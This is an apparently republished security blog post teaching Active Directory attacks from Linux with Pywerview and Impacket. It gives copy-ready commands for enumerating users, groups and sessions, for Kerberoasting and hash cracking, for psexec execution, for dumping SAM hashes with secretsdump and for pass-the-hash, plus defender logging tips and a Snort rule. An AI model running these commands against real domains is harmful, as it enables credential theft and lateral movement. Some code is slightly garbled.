Listen to this Post
Introduction:
Active Directory (AD) remains the crown jewel of enterprise authentication, and attackers increasingly target it from non-Windows platforms to evade detection. Pywerview, a Python port of the infamous PowerView, empowers red teamers and penetration testers to enumerate domain users, groups, computers, privileges, and logged-in sessions directly from a Linux machine—no PowerShell, no Windows agent required.
Learning Objectives:
- Install and configure Pywerview alongside its Impacket dependencies on a Linux attack host.
- Execute key AD enumeration commands to map domain users, groups, computers, and access rights.
- Apply post‑exploitation techniques such as SPN hunting and logged‑in session discovery for lateral movement planning.
You Should Know:
1. Installing Pywerview and Core Dependencies
Pywerview relies on Impacket for SMB/RPC communication and Python’s LDAP libraries. Follow this step‑by‑step guide to set up your Linux environment.
Step‑by‑step guide:
Update system and install Python3 & pip sudo apt update && sudo apt install python3 python3-pip git -y Clone Pywerview repository git clone https://github.com/the-useless-one/pywerview.git cd pywerview Install required Python packages pip3 install impacket ldap3 dnspython pycryptodome Optional: Create a virtual environment python3 -m venv pywerview-env source pywerview-env/bin/activate pip3 install -r requirements.txt if present, else manual install as above
Verification: Run `python3 pywerview.py -h` to see the help menu. Ensure Impacket’s `getTGT.py` or `secretsdump.py` are available in your PATH for advanced integration.
2. Enumerating Domain Users and Groups
Once Pywerview is installed, you can query the domain controller for all user objects and group memberships. This requires domain credentials (cleartext or NTLM hash) and the target DC’s IP or hostname.
Step‑by‑step guide:
List all domain users (requires valid credentials) python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-user Filter specific user attributes (e.g., displayName, title) python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-user -attr displayName,title,mail Enumerate all domain groups python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-group Get members of the "Domain Admins" group python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-group-member -groupname "Domain Admins"
Windows equivalent (for defenders): Use `net user /domain` or `Get-ADGroupMember -Identity “Domain Admins”` to audit the same information.
3. Discovering Computers and Domain Controllers
Mapping the AD infrastructure is critical for attack path visualization. Pywerview can list all computer objects and identify domain controllers.
Step‑by‑step guide:
List all computers in the domain python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-computer Show only operating system and DNS hostname python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-computer -attr name,operatingsystem,dNSHostName Find the primary domain controller (PDC) role holder python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-domain-controller
Defender tip: Monitor event ID 4662 (Directory Service Access) for unusual LDAP queries from non‑domain joined IPs—Linux attack hosts will often leave this trail.
4. Finding Logged‑in Users and Active Sessions
Identifying where high‑value users are logged in enables lateral movement. Pywerview uses the NetSessionEnum RPC call to retrieve session information.
Step‑by‑step guide:
List all active sessions on a specific server (e.g., file server) python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-net-session -computer fileserver.victim.local Enumerate sessions on all domain computers (can be noisy) for ip in $(nmap -sn 192.168.1.0/24 | grep "Nmap scan" | cut -d " " -f5); do python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-net-session -computer $ip done
Mitigation: Restrict `NetSessionEnum` access via hardened RPC filters and deploy Windows Defender Credential Guard to protect logged‑on credentials.
5. Hunting Privileged Accounts and SPNs (Kerberoasting)
Service Principal Names (SPNs) linked to high‑privileged accounts are prime Kerberoasting targets. Pywerview can extract SPNs from any Linux system.
Step‑by‑step guide:
Get all users with SPNs set (Kerberoastable accounts) python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-user-spns Request a TGS for a specific SPN (requires Impacket's GetUserSPNs) impacket-GetUserSPNs victim.local/john.doe:Password123 -dc-ip 192.168.1.10 -request Crack the hash offline using John or Hashcat hashcat -m 13100 kerberoast-hash.txt rockyou.txt
Why this matters: Non‑Windows attackers often bypass PowerShell logging. Pywerview’s Kerberoasting leaves different event IDs (4769) but blends with legitimate Linux admin traffic.
6. Leveraging Pywerview for Post‑Exploitation with Impacket
Combine Pywerview’s enumeration with Impacket’s execution tools (psexec, wmiexec, atexec) for a full Linux‑based attack chain.
Step‑by‑step guide:
Step 1: Enumerate domain admins python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-group-member -groupname "Domain Admins" Step 2: Use Impacket psexec to execute commands on a target machine impacket-psexec victim.local/administrator:[email protected] Step 3: Dump SAM hashes from the compromised server impacket-secretsdump victim.local/administrator:[email protected] Step 4: Pass‑the‑hash to other systems using Pywerview's -hashes option python3 pywerview.py -d victim.local -u administrator --hashes aad3b435b51404eeaad3b435b51404ee:hash123 --dc-ip 192.168.1.10 get-user
Lab recommendation: Set up a virtual lab with Samba AD DC or Windows Server to practice these steps legally.
7. Defensive Measures: Detecting Pywerview Abuse
Blue teams can detect Pywerview by monitoring for anomalous LDAP query patterns and RPC calls originating from Linux user agents.
Step‑by‑step guide for defenders:
Windows: Enable LDAP logging via Group Policy
Computer Config → Policies → Admin Templates → System → Directory Services → "LDAP server logging" = Enable
Query Windows event log for suspicious LDAP queries (Event ID 1644)
Get-WinEvent -LogName "Directory Service" | Where-Object {$<em>.Id -eq 1644 -and $</em>.Message -like "searchScope=2"}
Linux detection: Monitor for unusual Python processes making LDAP connections
sudo auditctl -a always,exit -F arch=b64 -S connect -k LDAP_OUTBOUND
Network rule example (Snort/Suricata):
alert tcp $HOME_NET any -> $DC_SERVER 389 (msg:"Pywerview LDAP Enumeration"; content:"|60 84|"; depth:2; flow:to_server; sid:1000001;)
What Undercode Say:
- Cross‑platform weaponization – Pywerview proves that AD attacks no longer require Windows; Linux red teams can fully map domains using only Python and RPC.
- Defensive blind spots – Most EDRs focus on PowerShell and Windows executables; Pywerview’s Impacket traffic often bypasses default alerts unless LDAP is deeply monitored.
- Mitigation is possible – Enforce LDAP signing, channel binding, and monitor for event ID 1644 with high‑volume search scopes to catch enumeration in real time.
Prediction:
As hybrid and Linux‑only workstations proliferate, tools like Pywerview will become standard in both red and purple team arsenals. Expect Microsoft to harden RPC and LDAP defaults (e.g., mandatory signing) within two years, pushing attackers toward more sophisticated API‑based enumeration via Graph or AD CS misconfigurations. Meanwhile, detection engineering must evolve to treat any LDAP search from a non‑domain machine as suspicious—turning Pywerview’s strength into its signature.
▶️ Related Video (82% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Active Directory – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
